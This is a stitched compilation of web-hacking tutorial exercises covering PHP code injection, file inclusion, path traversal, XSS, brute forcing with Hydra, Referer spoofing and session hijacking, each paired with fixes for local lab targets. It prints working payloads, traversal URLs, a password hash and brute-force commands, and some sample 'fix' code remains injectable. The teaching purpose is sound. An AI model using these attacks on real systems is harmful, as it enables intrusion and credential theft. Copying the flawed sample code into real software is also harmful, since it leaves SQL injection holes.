This data can then be shown to the user so he can check for illegal logins or it can be processed by some script to check for abnormal user behavior. Such an app can be vulnerable to direct static injection, because the gathered data can be tampered with by the user to include code which will execute itself when the user visits his log. Figure 3: How a user log may look. In this sample, the user clicks on the button, types his name and sees all data about that name. There is no session/cookie/authentication. From the data in the log, we can determine that $_SERVER["HTTP_USER_AGENT"] is used to gather information about the user’s browser & OS. Thus, we can easily start Tamper Data and change the User-Agent to include a piece of code that we want to try to execute and if the data is not properly sanitized – it will work. Figure 4: Changing the User-Agent Header The first time I changed it to <?php echo “I EXECUTED PHP SCRIPT “” ?> and I saw that it worked, so now I know that I can execute arbitrary code in the webpage. For example, here is what I get if I change the user-agent to <?php phpinfo(); ?> You can basically ruin this website. That is why our next exercises will touch on input sanitation. Exercise 11: File inclusion vulnerability There are times when you are required to load files from external servers. Sometimes the PHP code inside these pages has to be executed as well. If you want to use include() or require() you would need to set allow_url_include to ‘on’ in the php.ini file. It is not possible to turn it on using ini_set(‘allow_url_include’, ‘on’) inside the script. However, you can always create your own custom php.ini file and enable them there should you be using shared hosting (See Appendix 1 to see how to create custom php.ini in shared hosting). Furthermore, to turn on allow_url_include, allow_url_fopen has to be turned on. If the file that you want to get is not expected to contain php code, you can use file_get_contents to get its contents. If you want to use that function and still execute php code, you should evaluate the contents after loading them – eval(). In the example website, we have used the following method to load any file. $contents = file_get_contents($file . ".php"); echo eval("?> $contents"); If your website requires, it is a good idea to rely on whitelisting to filter out bad files. /* Avoiding path traversal and use of whitelisting. Only files that are in the $files array can be loaded to to the page. External files that are in the array would also be loaded successfully */ $file = $_GET['file']; $file = str_replace(array(".", "/"), "", $file); $files = ["calculator", "files", "visits", "mysql"]; if (in_array($file, $files)) { $contents = file_get_contents($file . ".php"); echo eval("?> $contents"); } else echo "<h3 style='text-align: center; color:#fff'>Bad file chosen.</h3>"; If we did not employ the whitelisting, the following and many more things could happen: Figure 5: The attacker can get the user’s cookies The attacker can give a URL to the website’s URL on which his own external script is loaded to a third user that uses the website to get the user’s cookies. He can even save them on a .txt file in the server which he can easily access to check for newly gathered cookies. Figure 6: The attacker can execute external programs/commands on the server Figure 7: The attacker can see/delete your entire app Basically, he can do whatever he wants, depending on your settings, should you make such a mistake. 
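Before moving on to Exercise 12, here is one way the visit log from Exercise 10 could be hardened: store the User-Agent as inert data and escape it on output, and never run log contents through eval() or include(). This is a sketch with made-up file and field names, not the exercise's original code.

<?php
// Hardened version of the Exercise 10 idea (sketch, hypothetical file name).
// The header is stored as plain data and escaped on output, so an injected
// PHP tag or "<script>" payload is displayed as text, never executed.
$logFile = 'visits.log';

// Logging a visit: keep each entry on one line and strip control characters.
$entry = [
    'ip'    => $_SERVER['REMOTE_ADDR'] ?? '-',
    'agent' => preg_replace('/[\r\n\t]+/', ' ', $_SERVER['HTTP_USER_AGENT'] ?? '-'),
    'time'  => date('c'),
];
file_put_contents($logFile, json_encode($entry) . PHP_EOL, FILE_APPEND | LOCK_EX);

// Displaying the log: escape every field, and never eval()/include() the file.
if (is_file($logFile)) {
    foreach (file($logFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $row = json_decode($line, true);
        if (!is_array($row)) {
            continue;
        }
        printf("<p>%s visited from %s using %s</p>\n",
            htmlspecialchars($row['time'], ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($row['ip'], ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($row['agent'], ENT_QUOTES, 'UTF-8'));
    }
}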
Exercise 12: Database Security When the example is opened, it creates a db with a table of 2 products. Then, you can perform an insecure search for product by this ID and a more secure one. You will have to insert your MySQL user credentials in includes/conn.php to run this example. Firstly, it should be noted that input sanitation would not remove second level SQL injections. That is why you can also employ whitelisting to allow the user to enter only the type of characters that are necessary for the functionality to work. The insecure search is made with the original mysql() API which is deprecated and should not be used in new projects. The more secure one is made with the PDO object. NOTE: PDO or mysqli should be used for handling MySQL. PDO can handle connections with all kinds of database servers – not just MySQL. It is more secure than the old mysql() API When using PDO you do not have to escape inputs with a function such as mysql_real_escape_string($string) but for the input to be properly escaped you would have to use prepare and execute statements instead of the direct $pdo_object->query($query_string). $query = $db->prepare("SELECT * FROM Products WHERE product_id = ?"); $query->execute(array($id)); Here is how a query might look like with prepare and execute methods applied. Secondly, we know that the user is supposed to enter a number (ID of the product) so we can use regex to filter the input and leave only the numbers from the input string which would prevent the input from becoming a second level sql injection (because the user would be able to store only digits on the database should the input be stored there). $id = $_POST['id']; $id = preg_replace("/[^0-9]/", "", $id); Here is how the whole query might look: require_once("conn.php"); if (isset($_POST['id'])) { $id = $_POST['id']; $id = preg_replace("/[^0-9]/", "", $id); $query = $db->prepare("SELECT * FROM Products WHERE product_id = ?"); $query->execute(array($id)); if (isset($id) AND $id !== "") { showData($query); } else { echo "<p>Bad query!</p>"; } And here is how the showData function looks. It can be reused each time some filter is applied to the database search queries. function showData($query) { if ($query->rowCount() > 0) { foreach($query as $row) { echo "<div class='product'>"; echo "<h3>Product: {$row['product_name']} </h3>"; echo "<h3>ID: $row[product_id] </h3>"; echo "<h3>Price: $$row[product_price] </h3>"; echo "<h3>Image: <img src='$row[product_img]' alt='$row[product_name]'</h3>"; echo "</div>"; } } else echo "<p>No products found!</p>"; } Connecting to a database with PDO looks like this: $db = new PDO("mysql:host=$host;dbname=$dbname;charset=utf8", "$root", "$root_password") where dbname may be omitted and mysql can be replaced with a different database. It is handy to do some checks before the request comes to the back-end of the app to decrease unnecessary load on server, provide better interface to the user (where he won’t have to wait for the server-side script to execute if he merely mistypes something, he can be shown directions as to what is wrong with his input, etc.) but you should always be aware that client-side validation can easily be circumvented. The search by ID can be set to be validated by the HTML5 built-in validation mechanism. However, for the validation to take place, the input-collecting tags must be within a <form> tag and the validation takes place when the user clicks the <input type=”submit”> button. 
<form action="" method="POST"> <h3> MORE SECURE</h3> <label for="db_byid">Find A Product by its ID</label><input name="id" type="number" max="500" maxlength="3" size="3"> <input type="submit" value="Find"> </form> Here is how the HTML5 validation may be used with our “Search by product id”. Here, the client will check whether the input is a number, lower than 500 and containing only 3 digits on ‘submit’. Alternatively, you can do your own validation on submit with js: var idGiven = $("#db_byid").val().trim().replace(/[^0-9]/g, ""); PHP Injection can easily occur when using eval() so be careful when allowing user input to run through eval(). Conclusion We are barely touching upon the vulnerabilities involved with web apps, but one has to be aware that the responsibility of security lies, to a large extent, in the developer’s hands and it is not an issue that has to be tackled by security experts only. The next part of the series is going to be more practically oriented. Appendix 1 Create the php.ini file in you root directory (home/username). Do not upload it in public_html or www as this will make the file publicly accessible. Create an .htaccess file in the same place and add the line SetEnv PHPRC /home/yourusernamehere/php.ini. And it’s done… You can add the code below to the .htaccess to further protect the file. <FilesMatch ".*.(ini)$"> order allow,deny deny from all </FilesMatch> NOTE: This will match all .ini files. Source
  22. Introduction To view Part I of this article, please visit Website Hacking 101 - InfoSec Institute. In this Part, we are going to briefly introduce Path Traversal, usage of Delimiters, and Information Disclosure attack. We are going to present simple solutions to simplified problems involving the attacks. Content Exercise 8: Path Traversal Figure : A simple webpage in which you choose an article and view it The website (index.php) in the PathTraversal folder contains a simple form which submits to the same page through the GET request method. Once a choice of article has been made and “View article” has been clicked, the following PHP code executes: <?php //If the article GET parameter is set if (isset($_GET["article"])) { // Create a div block and fill it with the contents from the file in the GET value. echo "<div id='article'>" . file_get_contents($_GET["article"]) . "</div>"; } ?> The result is the following URL: http://localhost/2/PathTraversal/?article=1.htm It loads the relevant article file placed in the GET method. The parameter article is formed via: <select name="article" required=""></select> And the values are also directly given through the HTML code (the value attribute): Domain Slamming Now, legitimate users will use the interface provided in the website to browse it, but with the code as it is we can easily open myriad files they do not want you to open by directly tampering with the URL parameters. Many websites have config directories where they store important data – let’s see if you can do it. Tasks Go back one directory and open openme.txt by changing the URL parameters. We assume that we cannot open the folder config from our computer but only from the local server. Assume you do not know what files there are in the directory. First, you should check whether the directory exists. The directory exists and now we know that there is HTTPAuth in place. Your task is to somehow find out the username and the hashed password for the folder without using any brute-force or dictionary attacks on the username and password. Spoiler (Task 2) If we know that there is a HTTPAuth security mechanism in place, then we can automatically deduce there is an .htaccess file. Therefore, we can open the .htaccess file that we would not be able to open normally via the path traversal vulnerability of the article viewer page. Figure: Viewing the .htaccess file from the article viewer page We type http://localhost/2/PathTraversal/?article=config/.htaccess and now we know the path and the file in which accounts and passwords are stored as well as the user that is required to view the folder. We type the path to the userlist.htpasswd file and get all usernames and passwords: tomburrows:$apr1$ZF.78h2N$zhAaP2AY6VwxuELizJAwg. Now, the username is known and we have incredibly reduced our cracking time. HTTPAuth is using UNIX’s “CRYPT” function to encrypt the passwords which is a “one way” encryption method. Using path traversal, we can also go back several directories and browse to the php.ini and other important configuration files as well. A sample solution to our path traversal vulnerability <?php //If the article GET parameter is set if (isset($_GET["article"])) { //Remove any “/” and “.” characters from the GET parameter’s value as this can be used for path traversal $article = str_replace(array("/", "."), "", $_GET["article"]); // If the file does not exist, print a custom error. if (!file_exists($article . 
".htm")) { echo "<h1>The article does not exist!</h1>"; } else { //If and only if the file exists – echo out its contents // Create a div block and fill it with the contents from the file in the GET value. //Add a mandatory file extension of .htm to the file echo "<div id='article'>" . file_get_contents($article . ".htm") . "</div>"; } } The change in the HTML code is that we no longer use the full file name value in the options tags, we just use the name of the file (without its extension so only .htm files would be allowed) <a title="Keyloggers: How They Work and More" href="http://resources.infosecinstitute.com/keyloggers-how-they-work-and-more/">Keyloggers: How They Work and More</a> Firstly, checking if the file exists and echoing it out only if it exists prevents another attack – that of information disclosure. There is a PHP warning thrown out if we type a non-existent file deliberately. Of course, another way to resolve such information disclosure issues is by turning off the display_errors In the php.ini file (this is most desirable if the site is live anyway). With the above mentioned code we get a clean and neat error that the article does not exist, along with prevention of any path traversal attempts. Figure: We now receive an error when we try to go back one directory and open the openme.txt file Note: in old editions of PHP (older than 5.5.3) you could use the %00 marker to end the string abruptly and pass your own file extension in place of the “.htm” one in our solution code. if (!file_exists($article . “.htm”)) could be exploited in older versions of PHP by typing: http://localhost/2/PathTraversal/?article=accounts.txt %00 Which is equivalent to: “accounts.txt.htm” forcing the server to ignore the .htm part of the string. Exercise 9: Information disclosure Figure: Comment page For this exercise, I have created a working but problematic comments page which looks similar to a chat. You have to write a comment, and then you view all the comments up to now. The comments are stored in a .txt file rather than in a database and there is one PHP file that creates new comments and one that displays them on the screen. //Index.php server-side code <?php $path = "comments/"; ?> <?php if ($_SERVER["REQUEST_METHOD"] === "POST") { include("add_comment.php"); } //Add_comment.php <?php //Open file and create an array with all comment information as indices $comments = file_get_contents($path . "comments.txt"); $newcomment = []; $newcomment[] = $_POST["name"]; $newcomment[] = $_POST["topic"]; $newcomment[] = $_POST["message"]; // Convert to string and add a delimiter to store in file $newcomment = implode(":", $newcomment); // Write the string to the file $comments_w = fopen($path . "comments.txt", 'w'); fwrite($comments_w, $comments . "n" . $newcomment . ":" ); // Show all comments include($path . "view_comments.php"); ?> Figure: How the comments file looks // View_comments.php <?php //Convert to array and echo all out in a certain format within the comments div $comments = explode(":", file_get_contents($path . "comments.txt")); echo "<div id='comments'>"; for ($i = 0; $i < count($comments) - 1; $i += 3) { echo "<p>User: " . $comments[$i] . "<br> posted about: ". $comments[$i + 1] . "<br> and he wrote: " . $comments[$i + 2]; echo " </p>"; } echo "</div>"; ?> This application works just fine when viewed as is, but imagine if a user enters add_comment.php separately, without the file being included from the index.php. 
This can easily happen, as the name of the service suggests the file name, this particular file name is frequently used, and the fact that add_comment.php sits in the same directory facilitates the process.

Figure: Viewing add_comment.php on its own

Now the attacker knows that we have a variable called $path and can probably guess that it sets the path to the comments file, since there is a warning that file_get_contents(comments.txt) cannot be opened. Thus, he also knows the name of the file that contains all our comments. Because the include is failing, he also learns the whole include_path, which can be dangerous too. The attacker also discovers another file in our directory tree (view_comments.php), so he can access it and look for more errors. He also knows that this file works with the POST values from the form, as he can view the HTML and see that the names are the same.

This comments form is also vulnerable to different code injection attacks. You can easily insert something like <script>alert(1)</script> in one of the comment fields to test it out. In that way, the users' browsers will execute any code you like each time they visit the page. A probable solution is easy: wrapping the POST values in the htmlspecialchars() function, which converts characters such as < and > into HTML entities (&lt;, &gt;, etc.), preventing them from being interpreted as code.

$newcomment[] = htmlspecialchars($_POST["name"]);
$newcomment[] = htmlspecialchars($_POST["topic"]);
$newcomment[] = htmlspecialchars($_POST["message"]);

Solution

A simple way to get rid of all those errors in this example is to wrap the code in add_comment.php and view_comments.php inside the following if statement:

if (isset($path)) {
    //code here
}

In that way, the code will only execute if the files are included from index.php. Of course, that does not handle the issue that users can post the form empty, still view the content and make the application think there is an actual comment, but that can easily be fixed and is not the issue under discussion here. Displaying errors is good for development purposes, but when the application is live and in production – always turn off display_errors in php.ini.

Exercise 10: Delimiters

We will be looking at a vulnerability similar to the one that existed in the old Poster website. Sometimes, parameters used in the code can be abused by users even when they only interact with the interface provided to them. Open the Delimiters folder from your localhost in a browser. There is a users.txt file which contains all the user data. However, access to it is forbidden from the .htaccess file:

<Files "users.txt">
Deny from all
</Files>

Try to open it using the path traversal method of the article viewer, just for practice. Look at the different data stored there and think about what everything represents. Try to log in with one of the accounts and escalate your privileges to "admin" just by communicating with the website as normal.

Spoiler

http://localhost/2/PathTraversal/?article=../Delimiters/users.txt //The path in the GET should be valid relative to the article viewer's index.php.

It should be clear that the ":" character is the delimiter between the different values. You can test this on the login form, but it should be clear that the first word before the first delimiter is the username, the second is the password and the third is the user's privileges.
The code that extracts the user data one line at a time is the following:

$userlist = fopen('users.txt', 'r');
while (!feof($userlist)) {
    $line = fgets($userlist);
    $acc_details = explode(":", $line);
    $username = $acc_details[0];
    $password = $acc_details[1];
    $access = $acc_details[2];

Then each line is checked against the submitted details to see whether it matches them:

if ($username === $_POST["name"] && $password === $_POST["pass"]) {

When it finds a match, the user can be logged in. Note that there are many better alternatives nowadays, such as using a database and cookies. When logged in, you have the option to change your username and/or password.

if (isset($_POST["pass"]) && trim($_POST['pass']) !== "") {
    $userlist = str_replace(/* old pass */ $_POST["userdata-pass"], /* new pass */ $_POST['pass'], $userlist);
    echo "<em>Password changed to: " . $_POST['pass'] . "</em>";

And to check the privileges, the script merely checks whether the substring "admin" occurs in the $access variable:

if (stripos($access, "admin") !== false) {
    echo "<img src='administrator.png' alt='admin' width='480' height='480' /><h1>Howdy, admin!</h1>";
}

Thus, it should be clear that you can abuse this mechanism by adding the ":" delimiter after your password and typing admin after it when you change your password.

Solution to this vulnerability

The solution is easy and is the same as in the previous exercise. We change the code slightly:

if (isset($_POST["usrname"]) && trim($_POST['usrname']) !== "") {
    //We remove any delimiters from the new account details and store the result in a variable
    $newacc = trim(str_replace(":", "", $_POST["usrname"]));
    //Then, we replace the old username with the $newacc variable
    $userlist = str_replace($_POST["userdata-acc"], $newacc, $userlist);
    echo "<em>Username changed to: " . $_POST['usrname'] . "</em>";
}

Besides sniffing and other problems, this website is again vulnerable to information disclosure, as the last iteration of the while loop spills out an empty line and a PHP error occurs each time a wrong password is submitted, unless display_errors is set to off. You can do the following to avoid this as well:

if (trim($line) === "") break;

Conclusion

Sometimes the solutions to vulnerabilities are really simple and do not take much time; you just have to split the application into pieces and test each of them apart from the single whole that is the application itself.

Source
23.

Introduction

Websites are used daily by a large part of the world's population to carry sensitive data from a person to an entity with an online presence. On websites containing materials that are shown only after authentication, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact. This article is written merely with penetration testing and website security in mind. Any attempts to penetrate live systems without consent may lead to criminal proceedings.

To try the training files that come along with this article, you will need a local server such as XAMPP or WAMP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you will need to install Cygwin's make, gcc and SSL libraries. Thereafter, you will need to start it from the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt.

Exercise 1: Deep Data Hiding

In the past, and even today, some people have relied on security through obscurity. This means that they have unprotected directories and files whose sole protection is that there are no backlinks or links to them from the main site. Thus, anyone who knew the URL of the directory or file could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed from being indexed by search engines. Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where uploaded .doc files from "users" are stored, then access it. If you upload a .doc file from the directory's main page to test this out, it won't leave your computer.

Exercise 2: Populating a Dictionary

To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder. You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.). To create a simple dictionary and save it to a file, you can browse to the John the Ripper installation directory in CMD and use:

john-mmx --incremental=alpha --stdout > filename

where filename is the name and location of the file in which the words should be saved. There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx --incremental=lanman --stdout > wordlist.txt, etc. Be aware that the size of the text file will probably get really big in just a couple of seconds, depending on your machine's capabilities.

Exercise 3: Acquiring user and password lists for dictionary attacks

Querying Google for passwords and user lists is usually pretty straightforward. You use something like filetype:lst password for passwords and filetype:lst user for username lists. We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article.

Exercise 4: Breaking HTTPAuth

For this exercise, we will be using Hydra and the user/pass lists included in the attachment files.
When calling Hydra ($ hydra.exe), the parameter -L usrlistpath supplies the program with a path to a username list file whose usernames will be tested along with all the passwords until a match is found. -l username gives Hydra a single username; this option can be used if you know the username you are trying to break into but do not know the particular password. -P loads a password list, while -p loads a single password. Next, you specify the host to attack (localhost or 127.0.0.1), followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (the path excluding the host, which is already given). It will most likely look something like this:

hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/

Figure 1: the HTTPAuth seeking credentials. Get them!

To establish a simple HTTPAuth mechanism yourself, you need to create your password by browsing to htpasswd.exe in your Apache bin folder, starting it in Command Prompt, and creating it. You can move the user account list file to any directory you want and enable the mechanism by editing your .htaccess file:

AuthType Basic
AuthName "Admin Area"
AuthUserFile /path/to/authorized.htpasswd
Require user …

You can allow only particular users to access the page, and you can set different username lists for different parts of the website, but this protection mechanism remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory.

Exercise 5: Breaking a POST login form

The password and username lists are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough. The following statement might work:

hydra -L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form "/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops"

The difference between this statement and the one we used to crack the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and password. Those are the "name" attributes of the relevant input tags that we want to test.

Figure 3: modifying the values of hidden inputs.

It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites, where you can change fields such as the name of the product directly by changing the value of a hidden input. There are some outdated shopping carts which still use the price as a hidden input, which means that if you don't use their API and verify the amount that was paid to you through a server-side script, the user can easily pay as much as he wants for the product!

Figure 4: an example of a shopping cart which sets the price of the item on the client side.

Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm.

2nd possibility: setting a loggedin GET parameter; that's probably not something you would encounter today, though.

3rd possibility, members2.php: install and start Tamper Data with Alt+T when the page is open. Add a new header called Referer with the path to login.php as its value; it will look as though you were redirected from login.php.
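For context, a hypothetical sketch of the kind of naive check this trick defeats (this is illustrative only; it is not the article's members2.php code, and the file and variable names are assumptions):

<?php
// members2.php (hypothetical sketch): trusts the Referer header, which the client fully controls.
// Anyone who adds "Referer: http://localhost/FormCracking/login.php" with Tamper Data
// passes this check without ever submitting valid credentials.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

if (strpos($referer, 'login.php') !== false) {
    echo "Welcome to the members area!";
} else {
    header("Location: login.php");
    exit;
}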
There are developers out there who think HTTP_REFERER proves that the user is legitimate, despite it being just a header sent with HTTP requests, and this is still a point of exploitation on some sites today.

Exercise 7: Exploiting Account Lockout

Say you have a simple lockout mechanism like this (PHP/MySQL, AccountLockout1 folder):

// Connecting to the MySQL database
mysql_connect("localhost", "root", "") or die(mysql_error());
mysql_select_db("userdb") or die(mysql_error());
// Loading the current number of attempts that the user has used
$attempts = mysql_fetch_array(mysql_query("SELECT attempts FROM users WHERE username = '" . $_POST['username'] . "'"))[0];
//If the login credentials are incorrect – add 1 to the attempts variable
else if ($_POST['pass'] != $info['password']) {
    $attempts += 1;
    echo "This is your " . $attempts . " attempt! ";
    //Stop the rest of the code from executing if the user has attempted to log in with incorrect details at least three times
    if ($attempts > 2) {
        die("<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1>");
    }
    // Update the attempts column of the particular user in the database
    mysql_query("UPDATE users SET attempts=" . $attempts . " WHERE username = '" . $_POST['username'] . "'");

If we have such a login form, or we rely on a plugin from WordPress or Joomla without being aware that it behaves this way, then malicious people can block an account just by knowing the username. On many sites the username is readily available, for example in comments to articles, message boards, social media likes, etc. A solution is both to block only the offending IP address and to enforce the block only for a limited duration.

A sample solution that adds a duration to the account lockout in PHP/MySQL could look something like this (folder AccountLockout2):

// SQL code to create the users table
CREATE TABLE users(
    ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR( 60 ),
    password VARCHAR( 60 ),
    attempts TINYINT,
    time TINYINT
)

Adding a user to the database could look like:

$insert = "INSERT INTO users (username, password, attempts, time) VALUES ('".$_POST['username']."', '".$_POST['pass']."', '" . "0'" . " , '-1'" . ")";

We use the number -1 to indicate that there is no lockout. Then we change the old code a bit:

if ($attempts > 2) {
    // If there is no lockout, create one and say when the account is going to be active again
    if ($info["time"] == "-1") {
        $expectedRelease = date("H") + 1;
        mysql_query("UPDATE users SET time=" . date("H") . " WHERE username = '" . $_POST['username'] . "'");
        die("<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com" . ". It is going to be active at: " . $expectedRelease . " o'clock</h1>");
    }
    // Otherwise, remove the lockout if an hour has passed
    else if ($info["time"] != -1 && date("H") > intval($info["time"])) {
        mysql_query("UPDATE users SET time='-1' WHERE username = '" . $_POST['username'] . "'");
        $attempts = 0;
    } else {
        //If the account is already locked out and an hour has not yet passed, just say it is locked and quit
        die("<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1>");
    }

This simple script will lock the account after 3 failed attempts until a full hour has passed since the lockout. It can be found in the AccLockoutDuration folder. Better still, implement an IP-based ban; the script above serves demonstrative purposes only.
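As an aside, and as a sketch only (not part of the article's attachment files), the same attempts lookup and update can be done with PDO prepared statements, which avoids the SQL injection risk of concatenating $_POST values into queries and replaces the deprecated mysql_* functions used above. The database, table and column names are assumed from the example:

<?php
// Illustrative sketch: attempts check with PDO prepared statements.
$pdo = new PDO('mysql:host=localhost;dbname=userdb', 'root', '', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Look up the current number of failed attempts; user input stays bound as data, never as SQL.
$stmt = $pdo->prepare('SELECT attempts FROM users WHERE username = ?');
$stmt->execute([$_POST['username']]);
$attempts = (int) $stmt->fetchColumn();

if ($attempts > 2) {
    die('<h1>This account is locked. Contact the administrator.</h1>');
}

// ...after a failed login, increment the counter safely:
$update = $pdo->prepare('UPDATE users SET attempts = ? WHERE username = ?');
$update->execute([$attempts + 1, $_POST['username']]);

Because the input is bound as a parameter, a username such as ' OR '1'='1 cannot alter the query.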
Exercise 8: yet to come…

Conclusion

We have barely covered the topic of website hacking and web security, as this is a vast field. Still, I hope future articles will reveal more and more of it, because a data leak can harm not only your business's reputation and your clients' trust and well-being, but can also expose you to serious legal proceedings.

Source
24.

Introduction

In this part of the Website Hacking series we are going to take a look at how to minimize the damage from XSS attacks, considering that our web application may at some point become vulnerable to this type of attack (HttpOnly cookies are going to be discussed). We are going to look at a mechanism for bypassing the protection that HttpOnly cookies provide, known as the Cross Site Tracing attack. We are also going to give a brief example of packet sniffing, followed by a lengthier discussion of session hijacking and session fixation.

Fill out the form below to download the code associated with this article. Each code piece that needs to be inserted in the article is linked to one of the files with the following syntax: Code.php SNIPPET 5 or Code2.php SNIPPET 7, where the first value is the file in which the code piece is located and the second is the particular code piece that has to be inserted. Inside the code files there are comments showing where each snippet starts and ends.

Minimizing damages from XSS (HTTPOnly Cookies)

If your site at some point becomes vulnerable to XSS, you probably know that your cookies will be exposed. The attacker can simply save document.cookie's value somewhere and use it for malicious purposes – for example, he can try to steal your session by looking for a session identifier in your cookies. As you know, the main difference between cookies and sessions is that cookies are stored locally on the user's machine, while sessions are stored on the server (usually in the tmp folder, which must be kept outside the public folder and out of reach of regular users). However, the way sessions work is that they save an ID which links the user with the particular session stored on the server, and this session ID (known as a magic cookie or session key) can be stored and passed to the server in a cookie.

Here is one way to make sure that if somebody could get document.cookie from your users, he does not get all the cookies you have stored for that user. Read the following setcookie description (as taken from php.net):

bool setcookie ( string $name [, string $value [, int $expire = 0 [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]]]] )

A way to ensure that an unauthorized person who can execute JavaScript on clients still cannot get the cookie is to set the last parameter ($httponly) to true. This disallows JavaScript from reading the cookie that you are setting. A sample cookie would look something like this: Code.php SNIPPET 1

Then you can easily access it with PHP with something like this: Code.php SNIPPET 2

Even better, there is a way to make sure all your cookies are HTTPOnly: you can set session.cookie_httponly to 1 in your php.ini file, or force HTTPOnly cookies only for particular pages/scripts on your website by adding Code.php SNIPPET 3 in the page's header. Another way to add an HTTPOnly cookie (a more low-level one) is to set the header yourself: Code.php SNIPPET 4

HTTPOnly Cookies circumvention and prevention (XST)

We have seen that HTTPOnly cookies disallow access to the cookies from JavaScript. However, a technique was crafted to circumvent this protection. It is known as XST, or the Cross Site Tracing attack. The attacker could target old browsers and type something similar to: Code.php SNIPPET 5

After this, the variable traceData would contain the cookies he desires as well as other data about the request.
However, in contemporary browsers the TRACE request method is disabled for AJAX requests by default (it throws a security error). Similar AJAX XST attempts should not work on clients running Firefox 19.0.2+ or Chrome 25.0.1364.172+. Thus, it may still be useful to block TRACE requests. To disable the method natively, open Apache's httpd.conf and add the following line:

TraceEnable off

This works on Apache versions above 1.3.34, or 2.0.55+ for Apache 2. Another way to disable the TRACE method without changing httpd.conf is to edit the .htaccess file and add: Disable_trace.txt

Note: mod_rewrite has to be enabled for the snippet to work.

Packet sniffing

There are many sites out there whose clients' credentials are vulnerable to man-in-the-middle attacks. When you are connected to a public Wi-Fi network, there could easily be someone at that restaurant sniffing the traffic. Here is a sample using Wireshark: firstly, we apply an HTTP filter to see only HTTP requests. Then we use Ctrl+F, search for a string and enter "POST" as the value to see only the POST requests (in most cases, those contain user-entered data, frequently interesting ones). Here we see a sample of unencrypted client/server communication after a registration form has been submitted. A fix for that is using HTTPS (TLS/SSL).

Session hijacking/Session fixation

Assuming another vulnerability is present (such as XSS), an attacker can see users' cookies, determine which one is the session ID (by default, PHP carries the session ID in a cookie called PHPSESSID) and hijack an active session. Below we have provided an explanation of how that could happen.

Assume we have this login script and login form in the same file (in a real application the accounts would be populated from a database). We can see that in the upper left corner there is a paragraph with the text "User appears NOT logged in" before the user has been logged in. Note: we have enhanced the form visually a bit with Bootstrap 3. The code is as follows: Code.php SNIPPET 6

We do not implement an actual attack but check our session ID cookie. Then we open the page in a browser that does not have any active sessions, start Tamper Data and submit the form with wrong credentials, but use the session ID of the actual logged-in user. The result: we have hijacked the session of a legitimate user and appear logged in. (We do not get redirected, but as you can see we are logged in and no wrong-credentials message appears.) Actually, as you can see, we are not redirected to the member zone, so the code inside the password-check conditional does not execute; but if we had code in another block that depends on the user being logged in or similar, then the attacker would have been able to run the code inside it and do whatever he wants with the user's account.

The first and least effective way of protecting against such attacks is to set session.referer_check = yourDomainHere in php.ini, or use ini_set to set it for a particular script. In that way, the session is only honored if the set domain/path appears in the referrer (roughly a substring check on $_SERVER['HTTP_REFERER'], and not a very effective method). Plus, it does not accept multiple parameters. Multiple parameters are supported in some frameworks such as CakePHP. What you should do is protect yourself against XSS attacks, as these can leak the session ID and lead to session hijacking.
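To make the recommendations around HttpOnly cookies and session IDs concrete, here is a minimal sketch of hardening PHP's session cookie and regenerating the session ID. The settings and functions are standard PHP, but the snippet itself is illustrative and is not one of the article's Code*.php files:

<?php
// Illustrative sketch: harden the session cookie before starting the session,
// then regenerate the session ID so a leaked or fixated ID becomes useless.
ini_set('session.cookie_httponly', 1);  // keep JavaScript from reading the session cookie
ini_set('session.cookie_secure', 1);    // only send the cookie over HTTPS (assumes TLS is in use)
ini_set('session.use_only_cookies', 1); // refuse session IDs passed in the URL

session_start();

// Regenerate the ID on login (and periodically afterwards).
if (empty($_SESSION['initiated'])) {
    session_regenerate_id(true); // true deletes the old session data file
    $_SESSION['initiated'] = true;
}

Regenerating the ID on login and at intervals also helps against the session fixation scenario discussed below.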
You should also use HttpOnly cookies to revoke JavaScript access to your cookies, possibly minimizing the damage from XSS and avoiding the leak of users' cookies. Another thing you can do is check whether the IP address of the person who first logged in and the IP address of the person using the session are the same (they are expected to be the same).

Firstly, we make the following changes (check whether there was a session hijacking attempt, tell the user that the attempt has been reported, and send an email): Code2.php SNIPPET 7

In the loop that checks whether the credentials match, we also have to log the person's IP address at the moment of logging them in: Code2.php SNIPPET 8

And we modify the section where we show content only to logged-in users to something like: Code2.php SNIPPET 9

We have logged in with Chrome as Kenny. We use a different IP address and try to steal the session with the session ID cookie credentials using Tamper Data. We get the following page: User appears NOT logged in (we have not fooled the script), and a notification that the breach was detected is displayed on the screen. And if we look at our email client, we will see a message resembling this one, but with the full IP address of the attacker written in the email's contents.

